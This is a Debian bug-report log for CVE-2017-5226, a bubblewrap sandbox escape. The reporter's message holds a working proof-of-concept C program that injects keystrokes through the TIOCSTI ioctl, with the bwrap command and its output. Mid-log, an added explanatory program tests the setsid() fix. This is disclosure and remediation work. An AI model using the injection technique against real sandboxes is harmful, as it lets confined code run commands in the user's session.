CVE-2017-5226 -- bubblewrap escape


Debian Bug report logs - #850702
CVE-2017-5226 -- bubblewrap escape


Reported by: up201407890@alunos.dcc.fc.up.pt

Date: Mon, 9 Jan 2017 13:48:02 UTC

Severity: grave

Tags: security, upstream

Found in version bubblewrap/0~git160513-1

Fixed in version bubblewrap/0.1.5-2

Done: Simon McVittie <smcv@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://github.com/projectatomic/bubblewrap/issues/142



Report forwarded to debian-bugs-dist@lists.debian.org, Laszlo Boszormenyi (GCS) <gcs@debian.org>:
Bug#850702; Package src:bubblewrap. (Mon, 09 Jan 2017 13:48:04 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>. (Mon, 09 Jan 2017 13:48:04 GMT)


Message #5 received at submit@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: submit@bugs.debian.org
Subject: CVE-2017-5226 -- bubblewrap escape
Date: Mon, 09 Jan 2017 14:19:36 +0100
Source: bubblewrap
Version: All
Severity: grave

Hi,

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

Thanks,
Federico Bento.

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.





Marked as found in versions bubblewrap/0.1.5-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 09 Jan 2017 16:09:02 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Laszlo Boszormenyi (GCS) <gcs@debian.org>:
Bug#850702; Package src:bubblewrap. (Mon, 09 Jan 2017 17:33:03 GMT)


Acknowledgement sent to Simon McVittie <smcv@debian.org>:
Extra info received and forwarded to list. Copy sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>. (Mon, 09 Jan 2017 17:33:03 GMT)


Message #12 received at 850702@bugs.debian.org:

From: Simon McVittie <smcv@debian.org>
To: up201407890@alunos.dcc.fc.up.pt, 850702@bugs.debian.org
Cc: security@debian.org
Subject: Re: Bug#850702: CVE-2017-5226 -- bubblewrap escape
Date: Mon, 9 Jan 2017 17:29:11 +0000
Control: reassign 850702 bubblewrap 0~git160513-1
Control: forwarded 850702 https://github.com/projectatomic/bubblewrap/issues/142
Control: tags 850702 + security upstream

On Mon, 09 Jan 2017 at 14:19:36 +0100, up201407890@alunos.dcc.fc.up.pt wrote:
> When executing a program via the bubblewrap sandbox, the nonpriv
> session can escape to the parent session by using the TIOCSTI ioctl to
> push characters into the terminal's input buffer, allowing an attacker
> to escape the sandbox.

Thanks. Do you have a proposed or preferred solution for this?

Please direct any further correspondence about this bug upstream if
possible: I've opened a GitHub bug
https://github.com/projectatomic/bubblewrap/issues/142 for that.

> This has been assigned CVE-2017-5226.

Assigned by whom?

If you are auditing for security vulnerabilities, please try to follow the
normal disclosure best-practices: in particular, if a vulnerability is not
already public, please contact upstream maintainers privately first, to
give them a chance to fix a vulnerability before the general public know
about it.

Regards,
    S



Bug reassigned from package 'src:bubblewrap' to 'bubblewrap'. Request was from Simon McVittie <smcv@debian.org> to 850702-submit@bugs.debian.org. (Mon, 09 Jan 2017 17:33:03 GMT)


No longer marked as found in versions bubblewrap/All and bubblewrap/0.1.5-1. Request was from Simon McVittie <smcv@debian.org> to 850702-submit@bugs.debian.org. (Mon, 09 Jan 2017 17:33:04 GMT)


Marked as found in versions bubblewrap/0~git160513-1. Request was from Simon McVittie <smcv@debian.org> to 850702-submit@bugs.debian.org. (Mon, 09 Jan 2017 17:33:04 GMT)


Set Bug forwarded-to-address to 'https://github.com/projectatomic/bubblewrap/issues/142'. Request was from Simon McVittie <smcv@debian.org> to 850702-submit@bugs.debian.org. (Mon, 09 Jan 2017 17:33:05 GMT)


Added tag(s) upstream and security. Request was from Simon McVittie <smcv@debian.org> to 850702-submit@bugs.debian.org. (Mon, 09 Jan 2017 17:33:06 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Laszlo Boszormenyi (GCS) <gcs@debian.org>:
Bug#850702; Package bubblewrap. (Mon, 09 Jan 2017 17:45:02 GMT)


Acknowledgement sent to Moritz Muehlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>. (Mon, 09 Jan 2017 17:45:02 GMT)


Message #27 received at 850702@bugs.debian.org:

From: Moritz Muehlenhoff <jmm@inutil.org>
To: Simon McVittie <smcv@debian.org>
Cc: up201407890@alunos.dcc.fc.up.pt, 850702@bugs.debian.org, security@debian.org
Subject: Re: Bug#850702: CVE-2017-5226 -- bubblewrap escape
Date: Mon, 9 Jan 2017 18:41:41 +0100
On Mon, Jan 09, 2017 at 05:29:11PM +0000, Simon McVittie wrote:
> Control: reassign 850702 bubblewrap 0~git160513-1
> Control: forwarded 850702 https://github.com/projectatomic/bubblewrap/issues/142
> Control: tags 850702 + security upstream
> 
> On Mon, 09 Jan 2017 at 14:19:36 +0100, up201407890@alunos.dcc.fc.up.pt wrote:
> > When executing a program via the bubblewrap sandbox, the nonpriv
> > session can escape to the parent session by using the TIOCSTI ioctl to
> > push characters into the terminal's input buffer, allowing an attacker
> > to escape the sandbox.
> 
> Thanks. Do you have a proposed or preferred solution for this?

This affects a range of other packages:
login: CVE-2005-4890
policycoreutils: CVE-2016-7545
coreutils: CVE-2016-2781
util-linux: CVE-2016-2779
policykit: CVE-2016-2568

I think we should just restrict the ioctl to non-privileged users...

Cheers,
        Moritz



Reply sent to Simon McVittie <smcv@debian.org>:
You have taken responsibility. (Mon, 09 Jan 2017 18:36:11 GMT)


Notification sent to up201407890@alunos.dcc.fc.up.pt:
Bug acknowledged by developer. (Mon, 09 Jan 2017 18:36:11 GMT)


Message #32 received at 850702-close@bugs.debian.org:

From: Simon McVittie <smcv@debian.org>
To: 850702-close@bugs.debian.org
Subject: Bug#850702: fixed in bubblewrap 0.1.5-2
Date: Mon, 09 Jan 2017 18:33:21 +0000
Source: bubblewrap
Source-Version: 0.1.5-2

We believe that the bug you reported is fixed in the latest version of
bubblewrap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 850702@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Simon McVittie <smcv@debian.org> (supplier of updated bubblewrap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)



Format: 1.8
Date: Mon, 09 Jan 2017 18:09:54 +0000
Source: bubblewrap
Binary: bubblewrap
Architecture: source
Version: 0.1.5-2
Distribution: unstable
Urgency: high
Maintainer: Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>
Changed-By: Simon McVittie <smcv@debian.org>
Description:
 bubblewrap - setuid wrapper for unprivileged chroot and namespace manipulation
Closes: 850702
Changes:
 bubblewrap (0.1.5-2) unstable; urgency=high
 .
   * d/p/Call-setsid-before-executing-sandboxed-code-CVE-2017-5226.patch:
     Call setsid() before executing sandboxed code, preventing a
     sandboxed executable invoked with a controlling terminal (for
     example in Flatpak) from escalating its privileges by injecting
     keypresses into the controlling terminal with the TIOCSTI
     ioctl. (Closes: #850702; CVE-2017-5226)
   * d/control: remove Maintainer status from Laszlo Boszormenyi at his
     request. Add him to Uploaders instead, and hand the package over
     to the Utopia Maintenance Team (the same as OSTree and Flatpak).
Checksums-Sha1:
 465ce1918329c65e441c2772d939c933479bb9ac 2177 bubblewrap_0.1.5-2.dsc
 741a7935a49fb36afdea5fd73b9ce3210901e1a3 5376 bubblewrap_0.1.5-2.debian.tar.xz
Checksums-Sha256:
 8fb221eb67a948380dc6718e79ace999a6ab9a8d3d1f777441f5abdf5acd02bc 2177 bubblewrap_0.1.5-2.dsc
 7164edcf23a4ee7dfee2bacb89634cbdd086843520be4eb45bc84560473e410b 5376 bubblewrap_0.1.5-2.debian.tar.xz
Files:
 f381ca8bd16072592b4efd3e236cab82 2177 admin optional bubblewrap_0.1.5-2.dsc
 e2546f647dd6d7bf7ac55012a1475a9c 5376 admin optional bubblewrap_0.1.5-2.debian.tar.xz



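The changelog entry above describes the fix: call setsid() before executing sandboxed code, so the sandboxed process starts a new session with no controlling terminal. The kernel only honours TIOCSTI when the target fd is the caller's own controlling terminal (or the caller holds CAP_SYS_ADMIN in the initial user namespace), so an inherited terminal fd can no longer be used to push keystrokes into the parent's input queue. The following program is an added example, not bubblewrap's code and not the Debian patch; it forks a child that takes the position of the sandboxed program, detaches it with setsid() the way the fix does, and then verifies from inside the child that the controlling terminal is gone and that TIOCSTI on the inherited stdin is refused. The function names and the return-code enum are this example's own assumptions.

```c
/* Added example (not bubblewrap's own code): demonstrates why calling
 * setsid() before exec defeats CVE-2017-5226. After setsid() the child has
 * no controlling terminal, so the kernel's "fd must be the caller's
 * controlling tty" check makes TIOCSTI fail (EPERM on a real terminal,
 * ENOTTY on a pipe or /dev/null). Names and codes below are assumptions. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

enum {
    PROBE_OK = 0,               /* detached, and TIOCSTI on stdin was refused */
    PROBE_SETSID_FAILED,        /* caller already led a process group */
    PROBE_NOT_SESSION_LEADER,   /* getsid(0) != getpid() after setsid() */
    PROBE_STILL_HAS_TTY,        /* /dev/tty could still be opened */
    PROBE_TIOCSTI_ALLOWED,      /* the injection ioctl succeeded */
    PROBE_SKIPPED_ROOT_TTY = 20 /* root on a real tty: CAP_SYS_ADMIN bypasses the check */
};

/* Runs in the forked child, i.e. where the sandboxed program would run. */
static int child_probe(void)
{
    /* Step 1: the fix. A new session means no controlling terminal. */
    if (setsid() == (pid_t)-1)
        return PROBE_SETSID_FAILED;
    if (getsid(0) != getpid())
        return PROBE_NOT_SESSION_LEADER;

    /* Step 2: a process without a controlling terminal cannot open /dev/tty
       (ENXIO). A missing /dev/tty (ENOENT) is treated the same way here. */
    int tty = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (tty >= 0) {
        close(tty);
        return PROBE_STILL_HAS_TTY;
    }

    /* CAP_SYS_ADMIN bypasses the controlling-terminal check, so as root on a
       real terminal the probe would actually inject a byte; skip it there. */
    if (geteuid() == 0 && isatty(STDIN_FILENO))
        return PROBE_SKIPPED_ROOT_TTY;

    /* Step 3: stdin is still whatever the parent handed down. Even if it is
       the parent's terminal, TIOCSTI is now refused and nothing reaches the
       parent's input queue. */
    char c = 'x';
    if (ioctl(STDIN_FILENO, TIOCSTI, &c) == 0)
        return PROBE_TIOCSTI_ALLOWED;
    return PROBE_OK;
}

/* Forks, detaches the child with setsid() as the fix does, and returns the
   child's probe code, or -1 on fork/wait failure. Forking first matters:
   setsid() fails with EPERM when the caller already leads a process group. */
int probe_sandbox_session(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(child_probe());
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    int r = probe_sandbox_session();
    printf("probe result: %d (%s)\n", r,
           r == PROBE_OK ? "detached; TIOCSTI refused" : "see enum in source");
    return (r == PROBE_OK || r == PROBE_SKIPPED_ROOT_TTY) ? 0 : 1;
}
```

Run it from an interactive shell as an unprivileged user and the probe returns 0 whether stdin is the terminal or a pipe: the child keeps the inherited fd, but after setsid() the kernel no longer treats that terminal as the child's own. The same check, without the setsid() call, is what the report's test.c relies on to succeed.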


Information forwarded to debian-bugs-dist@lists.debian.org, Laszlo Boszormenyi (GCS) <gcs@debian.org>:
Bug#850702; Package bubblewrap. (Mon, 09 Jan 2017 18:57:17 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
Extra info received and forwarded to list. Copy sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>. (Mon, 09 Jan 2017 18:57:17 GMT)


Message #37 received at 850702@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: "Simon McVittie" <smcv@debian.org>
Cc: 850702@bugs.debian.org, security@debian.org
Subject: Re: Bug#850702: CVE-2017-5226 -- bubblewrap escape
Date: Mon, 09 Jan 2017 19:28:35 +0100
Quoting "Simon McVittie" <smcv@debian.org>:

> Control: reassign 850702 bubblewrap 0~git160513-1
> Control: forwarded 850702 https://github.com/projectatomic/bubblewrap/issues/142
> Control: tags 850702 + security upstream
>
> On Mon, 09 Jan 2017 at 14:19:36 +0100, up201407890@alunos.dcc.fc.up.pt wrote:
>> When executing a program via the bubblewrap sandbox, the nonpriv
>> session can escape to the parent session by using the TIOCSTI ioctl to
>> push characters into the terminal's input buffer, allowing an attacker
>> to escape the sandbox.
>
> Thanks. Do you have a proposed or preferred solution for this?

Using setsid(), for example.

> Please direct any further correspondence about this bug upstream if
> possible: I've opened a GitHub bug
> https://github.com/projectatomic/bubblewrap/issues/142 for that.
>
>> This has been assigned CVE-2017-5226.
>
> Assigned by whom?

It was assigned by MITRE, using their web form.

> If you are auditing for security vulnerabilities, please try to follow the
> normal disclosure best-practices: in particular, if a vulnerability is not
> already public, please contact upstream maintainers privately first, to
> give them a chance to fix a vulnerability before the general public know
> about it.

Sorry about that.

As for blocking the ioctl, that breaks legitimate use.

I had this discussion with Stanislav Brabec, from SUSE a while ago.

"Just for curiosity, I just ran grep for TIOCSTI ioctl() over all
openSUSE sources. I got about 60 matches.

I analyzed use of some cases:

util-linux: used in agetty in wait_for_term_input()
kbd: contrib utility sti equal to tiocsti utility.
irda: Used by handle_scancode() to emulate input.
tcsh: Used in ed mode and in pushback().
emacs: Used in stuff_char() (putting char to be read from terminal)
..."








Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Thu, 09 Feb 2017 07:24:44 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 14:09:51 2019; Machine Name: buxtehude
